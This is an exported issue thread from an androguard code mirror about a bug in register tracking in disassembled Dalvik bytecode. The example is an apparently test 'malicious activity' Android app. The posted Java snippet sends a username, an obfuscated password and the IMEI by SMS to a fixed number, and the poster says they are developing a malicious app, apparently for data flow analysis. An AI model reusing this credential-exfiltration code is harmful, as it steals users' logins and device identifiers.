krnbwj / androguard

Automatically exported from code.google.com/p/androguard
Apache License 2.0
0 stars 0 forks source link

Method input parameters are not being used properly #127

Closed GoogleCodeExporter closed 8 years ago

GoogleCodeExporter commented 8 years ago
What steps will reproduce the problem?
1.
2.
3.

What is the expected output? What do you see instead?

What version of the product are you using? On what operating system?

Please provide any additional information below.

* Function call in the source code:

String message = "User: " + user.getUsername () + " + Pwd: " + obfPwd + " + 
Imei = " + imei;

sendsms("5556", message, "", context);

* Function definition in the source code:

public void sendsms(String paramString1, String paramString2, String 
paramString3, Context paramContext)
{
 SmsManager.getDefault().sendTextMessage(paramString1, null, paramString2, PendingIntent.getBroadcast(paramContext, 0, new Intent("SMS_SENT"), 0), PendingIntent.getBroadcast(paramContext, 0, new Intent("SMS_DELIVERED"), 0));
 }

* And the output generated with androGuard is:

Ledu/uta/testmaliciousactivity/MainActivity; sendsms (Ljava/lang/String; 
Ljava/lang/String; Ljava/lang/String; Landroid/content/Context;)V
     sendsms-BB@0x0 0 44 [ NEXT =   ] [ PREV =   ]
         0 const/4 v5, 0
         2 invoke-static Landroid/telephony/SmsManager;->getDefault()Landroid/telephony/SmsManager;
         8 move-result-object v0
         a const/4 v2, 0
         c new-instance v1, Landroid/content/Intent;
         10 const-string v3, 'SMS_SENT'
         14 invoke-direct v1, v3, Landroid/content/Intent;-><init>(Ljava/lang/String;)V
         1a invoke-static v10, v5, v1, v5, Landroid/app/PendingIntent;->getBroadcast(Landroid/content/Context; I Landroid/content/Intent; I)Landroid/app/PendingIntent;
         20 move-result-object v4
         22 new-instance v1, Landroid/content/Intent;
         26 const-string v3, 'SMS_DELIVERED'
         2a invoke-direct v1, v3, Landroid/content/Intent;-><init>(Ljava/lang/String;)V
         30 invoke-static v10, v5, v1, v5, Landroid/app/PendingIntent;->getBroadcast(Landroid/content/Context; I Landroid/content/Intent; I)Landroid/app/PendingIntent;
         36 move-result-object v5
         38 move-object v1, v7
         3a move-object v3, v8
         3c invoke-virtual/range v0 ... v5, Landroid/telephony/SmsManager;->sendTextMessage(Ljava/lang/String; Ljava/lang/String; Ljava/lang/String; Landroid/app/PendingIntent; Landroid/app/PendingIntent;)V
         42 return-void 

* All the registers (from v1 to v5) get their values in the functions but 
sendTextMessage() method call is supposed to take input parameters of sendsms() 
as arguments. Can someone please explain it? Please don't go for the code what 
it does. I am trying to develop a malicious app.

Original issue reported on code.google.com by Mohsinj...@gmail.com on 7 Jul 2013 at 7:54

GoogleCodeExporter commented 8 years ago

Original comment by anthony....@gmail.com on 8 Jul 2013 at 7:15

GoogleCodeExporter commented 8 years ago
Please spend your time to do useful things.

Original comment by anthony....@gmail.com on 8 Jul 2013 at 7:26

GoogleCodeExporter commented 8 years ago
I am sorry, if I couldn't explain it properly before.

3c invoke-virtual/range v0 ... v5, 
Landroid/telephony/SmsManager;->sendTextMessage(Ljava/lang/String; 
Ljava/lang/String; Ljava/lang/String; Landroid/app/PendingIntent; 
Landroid/app/PendingIntent;)V

Above function call uses registers v1-v5 for sendTextMessage() and values for 
first three registers (v1-v3) was supposed to come directly from sendsms() 
input parameters, as you can see in the java code too. But values for v1,v2 and 
v3 are being reset at c, a and 14 addresses respectively before being used in 
the sendTextMessage() which ideally should not happen probably.

I have to do data flow analysis. I would really appreciate your help in this 
matter. Thanks.

Original comment by Mohsinj...@gmail.com on 8 Jul 2013 at 4:37

GoogleCodeExporter commented 8 years ago
P.S.

I used a customized script with default settings to generate intra-procedural 
graph for an android app.

I am using this code (http://code.google.com/p/androguard/wiki/RE#CFG) to 
generate basic blocks for each method.

Original comment by Mohsinj...@gmail.com on 8 Jul 2013 at 4:43